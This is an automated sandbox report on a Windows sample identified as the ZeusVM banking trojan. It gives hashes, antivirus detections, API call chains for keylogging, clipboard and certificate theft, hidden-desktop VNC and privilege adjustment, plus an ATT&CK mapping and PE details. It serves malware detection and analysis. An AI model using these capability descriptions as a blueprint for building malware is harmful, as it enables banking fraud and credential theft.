Play interactive tour

Edit tour

Analysis Report MjjnJ90i5q

Overview

General Information

Sample Name:	MjjnJ90i5q (renamed file extension from none to exe)
Analysis ID:	359684
MD5:	6c7e2255031fdbb8efd157c2b4179319
SHA1:	f77cf9bb93945feb70c2519debbfbaec476156f3
SHA256:	277371d2f69231c4beced4f5898f2a6bd57f1fe7488e50decc6e7ea63ad5677f
Tags:	uncategorized
Infos:
Most interesting Screenshot:

Detection

ZeusVM

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

MjjnJ90i5q.exe (PID: 6584 cmdline: 'C:\Users\user\Desktop\MjjnJ90i5q.exe' MD5: 6C7E2255031FDBB8EFD157C2B4179319)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: MjjnJ90i5q.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: MjjnJ90i5q.exe	Virustotal: Detection: 87%			Perma Link
Source: MjjnJ90i5q.exe	ReversingLabs: Detection: 87%

Machine Learning detection for sample

Show sources

Source: MjjnJ90i5q.exe

Joe Sandbox ML: detected

Source: 0.2.MjjnJ90i5q.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK
Source: 0.0.MjjnJ90i5q.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK

Cryptography:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00412C66 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		0_2_00412C66
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0040D161 CryptUnprotectData,LocalFree,		0_2_0040D161

Compliance:

Uses 32bit PE files

Show sources

Source: MjjnJ90i5q.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Spreading:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041CCDE GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

0_2_0041CCDE

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0041702F FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0041702F
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_004170EA FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_004170EA

Networking:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00413803 CreateFileW,WaitForSingleObject,InternetReadFile,WriteFile,FlushFileBuffers,CloseHandle,

0_2_00413803

Source: MjjnJ90i5q.exe	String found in binary or memory: http://www.google.com/webhp
Source: MjjnJ90i5q.exe	String found in binary or memory: http://www.google.com/webhpbc-vMY.txt

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00419823 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,

0_2_00419823

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041D1BF EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_0041D1BF

Source: MjjnJ90i5q.exe, 00000000.00000002.230060266.00000000006DA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00404F00 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,

0_2_00404F00

Protection of GUI:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_004090BA OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

0_2_004090BA

System Summary:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00419823 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,	0_2_00419823
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00408D01 NtQueryInformationProcess,CloseHandle,NtCreateThread,	0_2_00408D01
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00408DB8 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	0_2_00408DB8

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_004132E3 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_004132E3

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0040A8D1 InitiateSystemShutdownExW,ExitWindowsEx,		0_2_0040A8D1
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00406B42 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,		0_2_00406B42

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0041115E	0_2_0041115E
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_004021EB	0_2_004021EB
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00412B72	0_2_00412B72
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00414714	0_2_00414714

Source: MjjnJ90i5q.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal72.bank.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0040C85B CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_0040C85B
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0040C6E6 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_0040C6E6

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041308D GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_0041308D

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041A01E CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,

0_2_0041A01E

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0040D880 CoCreateInstance,

0_2_0040D880

Source: MjjnJ90i5q.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MjjnJ90i5q.exe	Virustotal: Detection: 87%
Source: MjjnJ90i5q.exe	ReversingLabs: Detection: 87%

Data Obfuscation:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

0_2_0041CCDE

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00402475 push es; iretd	0_2_00402484
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00402B41 push cs; iretd	0_2_00402B50
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00402B0B push cs; ret	0_2_00402B20

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041A1A9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_0041A1A9

Malware Analysis System Evasion:

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_0041702F FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0041702F
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_004170EA FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_004170EA

Source: MjjnJ90i5q.exe, 00000000.00000002.230060266.00000000006DA000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

0_2_00419823

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

0_2_0041CCDE

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00405BBA mov edx, dword ptr fs:[00000030h]

0_2_00405BBA

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00405EFF GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_00405EFF

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00414FB0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_00414FB0

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041848E RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetLocalTime,

0_2_0041848E

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0040C68A GetUserNameExW,

0_2_0040C68A

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_00411AEB GetTimeZoneInformation,

0_2_00411AEB

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe

Code function: 0_2_0041D883 GetVersionExW,GetNativeSystemInfo,

0_2_0041D883

Lowering of HIPS / PFW / Operating System Security Settings:

Source: MjjnJ90i5q.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: MjjnJ90i5q.exe	String found in binary or memory: RFB 003.003
Source: MjjnJ90i5q.exe	String found in binary or memory: RFB 003.003
Source: MjjnJ90i5q.exe	String found in binary or memory: RFB 003.003

Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00414DE1 socket,bind,closesocket,		0_2_00414DE1
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe	Code function: 0_2_00414B03 socket,bind,listen,closesocket,		0_2_00414B03

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Create Account1	Valid Accounts1	Valid Accounts1	Input Capture21	Network Share Discovery1	Remote Desktop Protocol1	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Valid Accounts1	Access Token Manipulation11	Access Token Manipulation11	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	Application Shimming1	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MjjnJ90i5q.exe	88%	Virustotal		Browse
MjjnJ90i5q.exe	88%	ReversingLabs	Win32.Trojan.Zeus
MjjnJ90i5q.exe	100%	Avira	TR/Kazy.MK
MjjnJ90i5q.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.MjjnJ90i5q.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK		Download File
0.0.MjjnJ90i5q.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	359684
Start date:	28.02.2021
Start time:	16:35:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MjjnJ90i5q (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.bank.troj.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.6% (good quality ratio 92.3%) Quality average: 82.6% Quality standard deviation: 29.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	MS-DOS executable
Entropy (8bit):	6.676837061779834
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% DOS Executable Borland Pascal 7.0x (2037/25) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	MjjnJ90i5q.exe
File size:	141824
MD5:	6c7e2255031fdbb8efd157c2b4179319
SHA1:	f77cf9bb93945feb70c2519debbfbaec476156f3
SHA256:	277371d2f69231c4beced4f5898f2a6bd57f1fe7488e50decc6e7ea63ad5677f
SHA512:	8a992f53395fa4a0afbe9354a39cfee642b9f8b396b21317d16b21029221a5c379fbe16812ea85b4296064157f2053f2413ee5a1aa76c1fa3392d26fb79bb406
SSDEEP:	3072:qoOfm/6UGHsQQMZa0EuNcFsC+5gvVgb1CztHnh73Yrx76hQB:qoOfGgLQMEuNclvVgb1CQrxKQB
File Content Preview:	MZ......................................................................................................................................................................................................................PE..L......M.....................:.....

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x406e89
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x4D87B88B [Mon Mar 21 20:43:55 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3109dcd15fd9962082a2ee5da8d7b1e7

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 00000000h
xor bl, bl
call 00007F1F14D83A7Bh
test al, al
je 00007F1F14D84AEAh
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [0040127Ch]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [00401280h]
push eax
call dword ptr [004012C4h]
test eax, eax
je 00007F1F14D84A97h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007F1F14D84A51h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007F1F14D84A44h
cmp word ptr [ecx], 002Dh
jne 00007F1F14D84A3Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007F1F14D84A31h
cmp ecx, 69h
je 00007F1F14D84A28h
cmp ecx, 6Eh
je 00007F1F14D84A1Dh
cmp ecx, 76h
jne 00007F1F14D84A26h
mov byte ptr [ebp-01h], 00000001h
jmp 00007F1F14D84A20h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007F1F14D84A1Ah
mov bl, 01h
jmp 00007F1F14D84A16h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007F1F14D849D3h
push eax
call dword ptr [00401234h]
test bl, bl
je 00007F1F14D84A19h
call 00007F1F14D84444h
jmp 00007F1F14D84A46h
cmp byte ptr [ebp-01h], 00000000h
je 00007F1F14D84A35h
call 00007F1F14D9862Bh
call 00007F1F14D89E8Fh
test byte ptr [00422530h], 00000004h
mov bl, al
je 00007F1F14D84A2Dh
push 00000000h
mov eax, 00423E78h
call 00007F1F14D98488h
jmp 00007F1F14D84A1Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f7f4	0x118	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25000	0x11a8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x5a0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x206d4	0x20800	False	0.641256009615	data	6.70132877585	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x2050	0x400	False	0.21875	data	1.58300409118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x25000	0x166a	0x1800	False	0.621744791667	data	5.62347488179	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, CreateDirectoryW, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, OpenProcess, Thread32First, WideCharToMultiByte, ReadProcessMemory, HeapDestroy, HeapCreate, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, VirtualProtectEx, SetLastError, FindClose, CreateProcessW, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, SetFileAttributesW, CreateThread, GetLocalTime, CreateRemoteThread, Process32FirstW, Process32NextW, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, TlsAlloc, TlsFree, WTSGetActiveConsoleSessionId, GlobalLock, GlobalUnlock, GetNativeSystemInfo, GetTickCount, EnterCriticalSection, SetEndOfFile, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, LoadLibraryW, FreeLibrary, GetPrivateProfileIntW, FlushFileBuffers, GetSystemTime, ResetEvent, TerminateProcess, TlsSetValue, TlsGetValue, GetUserDefaultUILanguage, MoveFileExW, ExpandEnvironmentStringsW, GetProcessId, VirtualAlloc, SetThreadContext, GetThreadContext, ReleaseMutex, LoadLibraryA, GetCurrentThreadId, CreateFileW, GetFileAttributesW, LeaveCriticalSection, InitializeCriticalSection, WriteFile, GetPrivateProfileStringW, WriteProcessMemory, LocalFree, GetCurrentProcessId, CloseHandle, DuplicateHandle, OpenEventW, GetFileAttributesExW, lstrcmpiW, WaitForMultipleObjects, CreateEventW, GetProcAddress, GetModuleFileNameW, GetVersionExW, Sleep, VirtualFreeEx, VirtualFree, GetModuleHandleW, SetEvent, GetComputerNameW, SetErrorMode, GetCommandLineW, ExitProcess, lstrcmpiA, SetThreadPriority, GetCurrentThread, VirtualAllocEx, WaitForSingleObject
USER32.dll	CharLowerA, CharUpperW, SetWindowLongW, GetWindow, DispatchMessageW, GetSystemMetrics, CharLowerW, EndPaint, GetUpdateRgn, GetWindowDC, FillRect, DrawEdge, BeginPaint, GetUpdateRect, GetDC, IntersectRect, TranslateMessage, ReleaseDC, PostThreadMessageW, EqualRect, PrintWindow, DefWindowProcW, CreateDesktopW, SetProcessWindowStation, RegisterClassExW, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CloseDesktop, GetKeyboardState, ToUnicode, OpenInputDesktop, RegisterWindowMessageW, GetMenuItemID, SetKeyboardState, GetSubMenu, MenuItemFromPoint, GetMenu, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, GetMenuItemCount, HiliteMenuItem, EndMenu, GetShellWindow, DrawIcon, GetIconInfo, MapVirtualKeyW, RegisterClassExA, DefDlgProcW, GetClipboardData, DefWindowProcA, WindowFromPoint, DefMDIChildProcW, DefFrameProcA, GetDCEx, SwitchDesktop, CharToOemW, DefMDIChildProcA, RegisterClassW, CharLowerBuffA, ExitWindowsEx, CallWindowProcA, CallWindowProcW, DefFrameProcW, RegisterClassA, SetThreadDesktop, GetUserObjectInformationW, OpenWindowStationW, GetMessageA, GetWindowRect, GetMessageW, SetCapture, PostMessageW, GetParent, GetWindowInfo, GetClassLongW, GetCapture, SetCursorPos, GetWindowLongW, GetAncestor, PeekMessageW, PeekMessageA, SetWindowPos, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, GetThreadDesktop, IsRectEmpty, GetWindowThreadProcessId, GetMessagePos, MapWindowPoints, SendMessageW, ReleaseCapture, IsWindow, SendMessageTimeoutW, GetCursorPos, DefDlgProcA
ADVAPI32.dll	IsWellKnownSid, GetLengthSid, InitiateSystemShutdownExW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegSetValueExW, CryptHashData, EqualSid, ConvertSidToStringSidW
